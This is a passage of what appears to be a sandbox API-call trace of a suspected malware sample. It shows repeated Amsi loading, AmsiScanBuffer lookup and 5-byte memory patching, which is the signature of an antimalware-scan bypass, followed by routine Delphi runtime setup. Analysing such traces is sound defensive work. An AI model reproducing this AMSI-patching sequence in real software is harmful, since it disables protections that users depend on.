lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.898] GetCurrentProcess () returned 0xffffffff [0125.898] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.898] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.898] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.898] VirtualProtect (in: lpAddress=0x4d49000, dwSize=0x18b4, flNewProtect=0x80, lpflOldProtect=0x416fd90 | out: lpflOldProtect=0x416fd90*=0x1) returned 0 [0125.901] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.902] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.902] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0125.902] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.903] GetCurrentProcess () returned 0xffffffff [0125.903] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.903] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.903] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.903] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.904] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.904] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0125.904] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.905] GetCurrentProcess () returned 0xffffffff [0125.905] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.905] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.905] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.905] VirtualProtect (in: lpAddress=0x4d4b000, dwSize=0x36a0, flNewProtect=0x80, lpflOldProtect=0x416fd90 | out: lpflOldProtect=0x416fd90*=0x1) returned 0 [0125.908] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.909] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.909] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0125.909] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.910] GetCurrentProcess () returned 0xffffffff [0125.910] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.910] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.910] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.910] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.911] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.911] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0125.911] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.912] GetCurrentProcess () returned 0xffffffff [0125.912] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.912] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.912] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.912] VirtualProtect (in: lpAddress=0x4d4f000, dwSize=0x1480, flNewProtect=0x80, lpflOldProtect=0x416fd90 | out: lpflOldProtect=0x416fd90*=0x1) returned 0 [0125.916] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.916] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.916] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0125.916] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.917] GetCurrentProcess () returned 0xffffffff [0125.917] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.917] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.918] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.918] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.918] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.919] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0125.919] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.920] GetCurrentProcess () returned 0xffffffff [0125.920] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.920] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.920] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.920] VirtualProtect (in: lpAddress=0x4d51000, dwSize=0x2ccc, flNewProtect=0x80, lpflOldProtect=0x416fd90 | out: lpflOldProtect=0x416fd90*=0x1) returned 0 [0126.024] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0126.025] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0126.025] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0126.026] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0126.027] GetCurrentProcess () returned 0xffffffff [0126.027] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0126.027] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0126.028] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0126.028] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0126.028] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0126.029] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0126.029] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0126.030] GetCurrentProcess () returned 0xffffffff [0126.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0126.030] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0126.031] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0126.031] VirtualProtect (in: lpAddress=0x4d54000, dwSize=0x10, flNewProtect=0x80, lpflOldProtect=0x416fd90 | out: lpflOldProtect=0x416fd90*=0x1) returned 0 [0126.036] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0126.036] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0126.037] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0126.037] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0126.039] GetCurrentProcess () returned 0xffffffff [0126.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0126.039] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0126.039] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0126.039] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0126.040] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0126.040] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0126.040] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0126.041] GetCurrentProcess () returned 0xffffffff [0126.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0126.041] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0126.042] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0126.042] VirtualProtect (in: lpAddress=0x4d55000, dwSize=0x2e624, flNewProtect=0x80, lpflOldProtect=0x416fd90 | out: lpflOldProtect=0x416fd90*=0x1) returned 0 [0126.087] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x6e25a0 [0126.098] GetKeyboardType (nTypeFlag=0) returned 7 [0126.101] GetKeyboardType (nTypeFlag=1) returned 0 [0126.106] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe\" " [0126.106] GetStartupInfoA (in: lpStartupInfo=0x416f710 | out: lpStartupInfo=0x416f710*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0126.106] GetACP () returned 0x4e4 [0126.106] GetCurrentThreadId () returned 0xbb4 [0126.120] GetModuleFileNameA (in: hModule=0x4d20000, lpFilename=0x416e600, nSize=0x105 | out: lpFilename="\x01" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\\x01")) returned 0x0 [0126.120] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x416e4db, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe")) returned 0x62 [0126.120] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x416e5f0 | out: phkResult=0x416e5f0*=0x0) returned 0x2 [0126.121] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x416e5f0 | out: phkResult=0x416e5f0*=0x0) returned 0x2 [0126.122] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x416e5f0 | out: phkResult=0x416e5f0*=0x0) returned 0x2 [0126.122] lstrcpynA (in: lpString1=0x416e4db, lpString2="\x01", iMaxLength=261 | out: lpString1="\x01") returned="\x01" [0126.122] GetThreadLocale () returned 0x409 [0126.122] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x416e5eb, cchData=5 | out: lpLCData="ENU") returned 4 [0126.122] lstrlenA (lpString="\x01") returned 1 [0126.122] LoadStringA (in: hInstance=0x4d20000, uID=0xffc6, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffc5, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffc3, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffc4, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffd3, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffdf, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffd2, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffef, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffd6, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffd5, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffe8, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffe9, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffea, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.123] LoadStringA (in: hInstance=0x4d20000, uID=0xffe7, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xffe5, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xffe3, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xffe2, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xffe1, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xffe0, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xffff, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xfffe, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xfffd, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xfffc, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xfffb, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xfffa, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xfff9, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xfff8, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xfff7, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.124] LoadStringA (in: hInstance=0x4d20000, uID=0xfff6, lpBuffer=0x416e730, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.129] VirtualAlloc (lpAddress=0x0, dwSize=0x140000, flAllocationType=0x1000, flProtect=0x4) returned 0x4d90000 [0126.131] LoadStringA (in: hInstance=0x4d20000, uID=0xfff4, lpBuffer=0x416e71c, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.131] LoadStringA (in: hInstance=0x4d20000, uID=0xffe4, lpBuffer=0x416e71c, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0126.131] GetVersionExA (in: lpVersionInformation=0x416f6b4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xffffffff, dwMinorVersion=0x416f6d8, dwBuildNumber=0x0, dwPlatformId=0x416f6d4, szCSDVersion="") | out: lpVersionInformation=0x416f6b4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0126.137] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76720000 [0126.137] GetProcAddress (hModule=0x76720000, lpProcName="GetDiskFreeSpaceExA") returned 0x767469d0 [0126.138] GetThreadLocale () returned 0x409 [0126.138] GetSystemMetrics (nIndex=42) returned 0 [0126.143] GetThreadLocale () returned 0x409 [0126.143] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Jan") returned 4 [0126.143] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x416f58c, cchData=256 | out: lpLCData="January") returned 8 [0126.143] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Feb") returned 4 [0126.143] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x416f58c, cchData=256 | out: lpLCData="February") returned 9 [0126.143] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Mar") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x416f58c, cchData=256 | out: lpLCData="March") returned 6 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Apr") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x416f58c, cchData=256 | out: lpLCData="April") returned 6 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x416f58c, cchData=256 | out: lpLCData="May") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x416f58c, cchData=256 | out: lpLCData="May") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Jun") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x416f58c, cchData=256 | out: lpLCData="June") returned 5 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Jul") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x416f58c, cchData=256 | out: lpLCData="July") returned 5 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Aug") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x416f58c, cchData=256 | out: lpLCData="August") returned 7 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Sep") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x416f58c, cchData=256 | out: lpLCData="September") returned 10 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Oct") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x416f58c, cchData=256 | out: lpLCData="October") returned 8 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Nov") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x416f58c, cchData=256 | out: lpLCData="November") returned 9 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Dec") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x416f58c, cchData=256 | out: lpLCData="December") returned 9 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Sun") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Sunday") returned 7 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Mon") returned 4 [0126.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Monday") returned 7 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Tue") returned 4 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Tuesday") returned 8 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Wed") returned 4 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Wednesday") returned 10 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Thu") returned 4 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Thursday") returned 9 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Fri") returned 4 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Friday") returned 7 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Sat") returned 4 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x416f58c, cchData=256 | out: lpLCData="Saturday") returned 9 [0126.145] GetThreadLocale () returned 0x409 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x416f5e8, cchData=256 | out: lpLCData="$") returned 2 [0126.145] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x416f5e8, cchData=256 | out: lpLCData="0") returned 2 [0126.150] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x416f5e8, cchData=256 | out: lpLCData="0") returned 2 [0126.150] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x416f6e0, cchData=2 | out: lpLCData=",") returned 2 [0126.150] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x416f6e0, cchData=2 | out: lpLCData=".") returned 2 [0126.150] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x416f5e8, cchData=256 | out: lpLCData="2") returned 2 [0126.150] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x416f6e0, cchData=2 | out: lpLCData="/") returned 2 [0126.150] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x416f5e8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0126.151] GetThreadLocale () returned 0x409 [0126.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x416f5b4, cchData=256 | out: lpLCData="1") returned 2 [0126.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x416f5e8, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0126.151] GetThreadLocale () returned 0x409 [0126.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x416f5b4, cchData=256 | out: lpLCData="1") returned 2 [0126.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x416f6e0, cchData=2 | out: lpLCData=":") returned 2 [0126.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x416f5e8, cchData=256 | out: lpLCData="AM") returned 3 [0126.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x416f5e8, cchData=256 | out: lpLCData="PM") returned 3 [0126.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x416f5e8, cchData=256 | out: lpLCData="0") returned 2 [0126.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x416f5e8, cchData=256 | out: lpLCData="0") returned 2 [0126.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x416f5e8, cchData=256 | out: lpLCData="0") returned 2 [0126.151] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x416f6e0, cchData=2 | out: lpLCData=",") returned 2 [0126.159] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76680000 [0126.160] GetProcAddress (hModule=0x76680000, lpProcName="VariantChangeTypeEx") returned 0x76697260 [0126.160] GetProcAddress (hModule=0x76680000, lpProcName="VarNeg") returned 0x766e2470 [0126.161] GetProcAddress (hModule=0x76680000, lpProcName="VarNot") returned 0x766e36e0 [0126.161] GetProcAddress (hModule=0x76680000, lpProcName="VarAdd") returned 0x766bcbb0 [0126.161] GetProcAddress (hModule=0x76680000, lpProcName="VarSub") returned 0x766be0d0 [0126.161] GetProcAddress (hModule=0x76680000, lpProcName="VarMul") returned 0x766bd800 [0126.162] GetProcAddress (hModule=0x76680000, lpProcName="VarDiv") returned 0x766e2980 [0126.162] GetProcAddress (hModule=0x76680000, lpProcName="VarIdiv") returned 0x766e3320 [0126.162] GetProcAddress (hModule=0x76680000, lpProcName="VarMod") returned 0x766e3580 [0126.162] GetProcAddress (hModule=0x76680000, lpProcName="VarAnd") returned 0x766b3690 [0126.163] GetProcAddress (hModule=0x76680000, lpProcName="VarOr") returned 0x766e3790 [0126.163] GetProcAddress (hModule=0x76680000, lpProcName="VarXor") returned 0x766e3930 [0126.163] GetProcAddress (hModule=0x76680000, lpProcName="VarCmp") returned 0x76692ae0 [0126.164] GetProcAddress (hModule=0x76680000, lpProcName="VarI4FromStr") returned 0x76695140 [0126.164] GetProcAddress (hModule=0x76680000, lpProcName="VarR4FromStr") returned 0x766b3020 [0126.164] GetProcAddress (hModule=0x76680000, lpProcName="VarR8FromStr") returned 0x766b3cd0 [0126.165] GetProcAddress (hModule=0x76680000, lpProcName="VarDateFromStr") returned 0x766a8b20 [0126.165] GetProcAddress (hModule=0x76680000, lpProcName="VarCyFromStr") returned 0x76692280 [0126.165] GetProcAddress (hModule=0x76680000, lpProcName="VarBoolFromStr") returned 0x766944d0 [0126.165] GetProcAddress (hModule=0x76680000, lpProcName="VarBstrFromCy") returned 0x766b31c0 [0126.166] GetProcAddress (hModule=0x76680000, lpProcName="VarBstrFromDate") returned 0x766a99f0 [0126.166] GetProcAddress (hModule=0x76680000, lpProcName="VarBstrFromBool") returned 0x76694480 [0126.182] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x548 [0126.183] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x54c [0126.183] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x550 [0126.222] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x74dc0000 [0126.222] GetProcAddress (hModule=0x74dc0000, lpProcName="CoCreateInstanceEx") returned 0x76375bc0 [0126.223] GetProcAddress (hModule=0x74dc0000, lpProcName="CoInitializeEx") returned 0x763088d0 [0126.223] GetProcAddress 